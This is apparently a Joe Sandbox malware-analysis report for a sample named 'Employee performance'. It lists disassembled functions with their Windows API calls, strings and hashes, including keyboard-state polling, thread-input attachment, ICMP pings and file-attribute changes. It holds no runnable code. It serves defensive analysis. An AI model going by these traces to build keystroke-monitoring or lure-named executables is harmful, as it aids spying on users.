Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: b4856c262fb3f87e80bfbd3b28bcc72a593619cb9bc11f05d360a65af377211f
Instruction ID: acb5d94c334da6ae43d22e2211c79b573e55b20e53aff5ea7a075165a7cb86d7
Opcode Fuzzy Hash: b4856c262fb3f87e80bfbd3b28bcc72a593619cb9bc11f05d360a65af377211f
Instruction Fuzzy Hash: A8416375A0021ADFDF11DF68C8549EDBBB9FF48384F008065E985A7261CB35E945CFA0

Function 01039C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 01039CA1
GetAsyncKeyState.USER32(000000A0), ref: 01039D22
GetKeyState.USER32(000000A0), ref: 01039D3D
GetAsyncKeyState.USER32(000000A1), ref: 01039D57
GetKeyState.USER32(000000A1), ref: 01039D6C
GetAsyncKeyState.USER32(00000011), ref: 01039D84
GetKeyState.USER32(00000011), ref: 01039D96
GetAsyncKeyState.USER32(00000012), ref: 01039DAE
GetKeyState.USER32(00000012), ref: 01039DC0
GetAsyncKeyState.USER32(0000005B), ref: 01039DD8
GetKeyState.USER32(0000005B), ref: 01039DEA

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: f1986d121c2b0499c81e568c8a95325c4fd21af2abfd17b741e8d5930ab44014
Instruction ID: 8ddbc0a7a3485ff44324ce7747d7175fbc25d3aca39f0146376ede1111906efa
Opcode Fuzzy Hash: f1986d121c2b0499c81e568c8a95325c4fd21af2abfd17b741e8d5930ab44014
Instruction Fuzzy Hash: 3A41F9345047C969FFB2666885093B6BEE86F81308F0480DED6C6562C3DBE595C4CBA2

Function 0105055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 010505BC
inet_addr.WSOCK32(?), ref: 0105061C
gethostbyname.WSOCK32(?), ref: 01050628
IcmpCreateFile.IPHLPAPI ref: 01050636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 010506C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 010506E5
IcmpCloseHandle.IPHLPAPI(?), ref: 010507B9
WSACleanup.WSOCK32 ref: 010507BF

Strings

Ping, xrefs: 01050676

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 64a93da64d48a6ac5e3f57f8fa22417159550629dca38e8a36690d163520740e
Instruction ID: 530c88217615c81d873a2bbb035197678a15986a1affd996b3cd17d89c99e3f5
Opcode Fuzzy Hash: 64a93da64d48a6ac5e3f57f8fa22417159550629dca38e8a36690d163520740e
Instruction Fuzzy Hash: 35918E759042019FD360CF19C988B1BBBE0BF44318F0885A9F9A98B7A6C735ED45CF91

Function 01058CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 01058CF3

Part of subcall function 01038E54: _wcslen.LIBCMT ref: 01038E77

_wcslen.LIBCMT ref: 01058D4E
_wcslen.LIBCMT ref: 01058D9C
_wcslen.LIBCMT ref: 01058DDC
_wcslen.LIBCMT ref: 01058E6E

Strings

none, xrefs: 01058E65, 01058E6A
winapi, xrefs: 01058D96, 01058D9B
cdecl, xrefs: 01058D48, 01058D4D
stdcall, xrefs: 01058DD6, 01058DDB

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: b934d34037c45b8cc22cdb644634b6aa4a9d0ca2efdcb7013ecbadc9748b6a22
Instruction ID: ced4025b4cc7a960c84c0658319db679311b62e2dd4e9f970ef330f5e9854e8a
Opcode Fuzzy Hash: b934d34037c45b8cc22cdb644634b6aa4a9d0ca2efdcb7013ecbadc9748b6a22
Instruction Fuzzy Hash: AD51C032A000169BCFA4DF6DC8508BFB7F6AF54324B24825AEDA6E7285D735DD40D790

Function 0105372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 01053774
CoUninitialize.OLE32 ref: 0105377F
CoCreateInstance.OLE32(?,00000000,00000017,0106FB78,?), ref: 010537D9
IIDFromString.OLE32(?,?), ref: 0105384C
VariantInit.OLEAUT32(?), ref: 010538E4
VariantClear.OLEAUT32(?), ref: 01053936

Strings

Invalid parameter, xrefs: 01053865
Failed to create object, xrefs: 010537E4, 0105389A
NULL Pointer assignment, xrefs: 0105381E

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: f58d95cb8e51fe0938d72d46c68d6b6da90a5e4f534589811711fa6b8a962d49
Instruction ID: c7cd3c74ee59b6bc1d673b338ded1d3d687f7a53860054f1f9dcfc2e21b1cb09
Opcode Fuzzy Hash: f58d95cb8e51fe0938d72d46c68d6b6da90a5e4f534589811711fa6b8a962d49
Instruction Fuzzy Hash: 2C618E71608301AFD361DF55C888B6BBBE8FF88754F040859F9C59B291D774E948CB92

Function 01043388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 010433CF

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 010433F0

Strings

^ ERROR , xrefs: 0104349E
Incorrect parameters to object property !, xrefs: 010434AB
"%s" (%d) : ==> %s:, xrefs: 01043522
Line %d (File "%s"):, xrefs: 01043443, 0104345C
Error: , xrefs: 010434D1
"%s" (%d) : ==> %s:%s%s, xrefs: 01043504

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 53c2cbbf596e216b62ee677718ca8426f73758998bf3b5a8b2041ff0c0595603
Instruction ID: 3dc49e6d6bda82776387202897097a35a439c1a051a68de7117b61b076f3d4d2
Opcode Fuzzy Hash: 53c2cbbf596e216b62ee677718ca8426f73758998bf3b5a8b2041ff0c0595603
Instruction Fuzzy Hash: 2B51F17290021AABDF14EBE0CE42EEEB77AAF14340F144066F14576151EB7A2F58EF61

Function 0103B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0103B5FC
_wcslen.LIBCMT ref: 0103B608
_wcslen.LIBCMT ref: 0103B64D
_wcslen.LIBCMT ref: 0103B68C
_wcslen.LIBCMT ref: 0103B6C7

Strings

REMOVE, xrefs: 0103B602, 0103B607
APPEND, xrefs: 0103B6C1, 0103B6C6
KEYS, xrefs: 0103B647, 0103B64C
EXISTS, xrefs: 0103B686, 0103B68B

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: ea03d93c8856da25cf8c31e846d548aa488444c3e406de2a32b4b09308fa92f0
Instruction ID: f88ba4f06b81986e45942c1912d805af8ea06d391b0fb513294f003d6634ddc5
Opcode Fuzzy Hash: ea03d93c8856da25cf8c31e846d548aa488444c3e406de2a32b4b09308fa92f0
Instruction Fuzzy Hash: BC412832B000268BCB205F7DCC905BEBBE9BFD4658B144169E5A1DB286F639C881E390

Function 01045393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 010453A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 01045416
GetLastError.KERNEL32 ref: 01045420
SetErrorMode.KERNEL32(00000000,READY), ref: 010454A7

Strings

NOTREADY, xrefs: 0104544B
INVALID, xrefs: 01045459
UNKNOWN, xrefs: 01045444
READY, xrefs: 01045460, 01045468
READONLY, xrefs: 01045452

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: b159bba315553b762215af167254b20cbd942381428c2feb545358d30205a2fd
Instruction ID: 6f0f1b6f41f6c25da1d5f4b4afc45378b3d490dc5f705b32a4d3efe5887d6535
Opcode Fuzzy Hash: b159bba315553b762215af167254b20cbd942381428c2feb545358d30205a2fd
Instruction Fuzzy Hash: 6D319FB5A002059FDB11DF68C8C4AAA7BF4FB85309F0880A5F585CF292EB75D942CB90

Function 01063C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 01063C79
SetMenu.USER32(?,00000000), ref: 01063C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01063D10
IsMenu.USER32(?), ref: 01063D24
CreatePopupMenu.USER32 ref: 01063D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01063D5B
DrawMenuBar.USER32 ref: 01063D63

Strings

F, xrefs: 01063D4E
0, xrefs: 01063C54

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 30cc3d6934ce14de08e3147ed5d15d82301b3f802858a79698059384d908a2d5
Instruction ID: 70519c22da2a8c197c2e1518116ccd74c1c0fd156e53bb0e30968d13112c347f
Opcode Fuzzy Hash: 30cc3d6934ce14de08e3147ed5d15d82301b3f802858a79698059384d908a2d5
Instruction Fuzzy Hash: 5B417F75A01209EFEB24DF64E844ADA7BF9FF49350F040069FA8A9B360D735A910CF94

Function 01063A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01063A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01063AA0
GetWindowLongW.USER32(?,000000F0), ref: 01063AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01063AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01063B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 01063BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 01063BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 01063BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 01063BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 01063C13

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 112352f5b5d9f57dc255ff36c71ad05ebcb93d5e7ef2fe5a1632e29163a87830
Instruction ID: a4b2639126ca93b18287cfb6cb409277444c8c7072372c39bc72030e27ee7cae
Opcode Fuzzy Hash: 112352f5b5d9f57dc255ff36c71ad05ebcb93d5e7ef2fe5a1632e29163a87830
Instruction Fuzzy Hash: F7616A75900208AFDB20DFA8CC81EEE77F8FF09714F10019AFA95AB291D775A945DB90

Function 0103B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0103B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0103A1E1,?,00000001), ref: 0103B165
GetWindowThreadProcessId.USER32(00000000), ref: 0103B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0103A1E1,?,00000001), ref: 0103B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0103B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0103A1E1,?,00000001), ref: 0103B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0103A1E1,?,00000001), ref: 0103B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0103A1E1,?,00000001), ref: 0103B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0103A1E1,?,00000001), ref: 0103B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0103A1E1,?,00000001), ref: 0103B21D

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 3b1db2c314b246af02284a4ac496ec88b6c38791e87dc866b3545890ad93e05d
Instruction ID: b68c108820f56959957790cc2f2022563ecd9121f45f1d76a645ba33c96314be
Opcode Fuzzy Hash: 3b1db2c314b246af02284a4ac496ec88b6c38791e87dc866b3545890ad93e05d
Instruction Fuzzy Hash: FB31FD71180604BFEB359F28D849F6DBBEDBB86319F504104FAC2CA185C7BAA8008F24

Function 01002C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01002C94

Part of subcall function 010029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000), ref: 010029DE
Part of subcall function 010029C8: GetLastError.KERNEL32(00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000,00000000), ref: 010029F0

_free.LIBCMT ref: 01002CA0
_free.LIBCMT ref: 01002CAB
_free.LIBCMT ref: 01002CB6
_free.LIBCMT ref: 01002CC1
_free.LIBCMT ref: 01002CCC
_free.LIBCMT ref: 01002CD7
_free.LIBCMT ref: 01002CE2
_free.LIBCMT ref: 01002CED
_free.LIBCMT ref: 01002CFB

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ba35a973b1fbe16c663b514a5646209d321e4f6596c4f6516b500fb7509020a7
Instruction ID: c4a5c549467f4ce043041e07c10291093d6a69478084efb5f7e8131261c4af66
Opcode Fuzzy Hash: ba35a973b1fbe16c663b514a5646209d321e4f6596c4f6516b500fb7509020a7
Instruction Fuzzy Hash: 1511B676500109BFEB03EF94D885CDD3BA9FF15390F6144A5FA889F2A1DA31EE509B90

Function 00FD1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FD1459
OleUninitialize.OLE32(?,00000000), ref: 00FD14F8
UnregisterHotKey.USER32(?), ref: 00FD16DD
DestroyWindow.USER32(?), ref: 010124B9
FreeLibrary.KERNEL32(?), ref: 0101251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0101254B

Strings

close all, xrefs: 00FD1454

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 20a0cc3d2cdfd286163f5ea328b1dc84916d5a52cfb2f87471c643640ddd39a8
Instruction ID: b29d196f10a7134eb2b10cb37aa3a24d4482faf95ff0c8e222f882915fb08ab3
Opcode Fuzzy Hash: 20a0cc3d2cdfd286163f5ea328b1dc84916d5a52cfb2f87471c643640ddd39a8
Instruction Fuzzy Hash: DAD19931701212DFDB29EF15C998B28F7A5BF05700F2842AEE58A6B365CB34AC12DF50

Function 01047DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01047FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 01047FC1
GetFileAttributesW.KERNEL32(?), ref: 01047FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 01048005
SetCurrentDirectoryW.KERNEL32(?), ref: 01048017
SetCurrentDirectoryW.KERNEL32(?), ref: 01048060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 010480B0

Strings

*.*, xrefs: 01048066

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: cd5334f080d820bed8b8acbd0f583eafe605d2b41772794a6e612810d659e189
Instruction ID: a3c9cd633eb68de918236dc879005afd26d3c815c9e65bf6e997972653ae80ba
Opcode Fuzzy Hash: cd5334f080d820bed8b8acbd0f583eafe605d2b41772794a6e612810d659e189
Instruction Fuzzy Hash: 4981C1B25042019BDB74EF59C884AAEB7E9BF88310F084D6EF9C5C7250E735D945CB92

Function 00FD5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00FD5C7A

Part of subcall function 00FD5D0A: GetClientRect.USER32(?,?), ref: 00FD5D30
Part of subcall function 00FD5D0A: GetWindowRect.USER32(?,?), ref: 00FD5D71
Part of subcall function 00FD5D0A: ScreenToClient.USER32(?,?), ref: 00FD5D99

GetDC.USER32 ref: 010146F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 01014708
SelectObject.GDI32(00000000,00000000), ref: 01014716
SelectObject.GDI32(00000000,00000000), ref: 0101472B
ReleaseDC.USER32(?,00000000), ref: 01014733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 010147C4

Strings

U, xrefs: 01014693

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: e819c201679f4b7518b39605973d6faef0c5f1c5fb4255aa69893ffc96ed1ba2
Instruction ID: 0860b4c19cc7d5986dcfc46463849bf5723e87a7579a31f5ee21f49d859e25ba
Opcode Fuzzy Hash: e819c201679f4b7518b39605973d6faef0c5f1c5fb4255aa69893ffc96ed1ba2
Instruction Fuzzy Hash: EA71E331500205DFDF218F68C984ABE3BB6FF49365F1842A6EED59A26AC3399841DF50

Function 0104359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 010435E4

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

LoadStringW.USER32(010A2390,?,00000FFF,?), ref: 0104360A

Strings

^ ERROR, xrefs: 010436C9
"%s" (%d) : ==> %s:, xrefs: 01043742
Line %d (File "%s"):, xrefs: 0104366B
Error: , xrefs: 010436EF
"%s" (%d) : ==> %s:%s%s, xrefs: 01043724

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
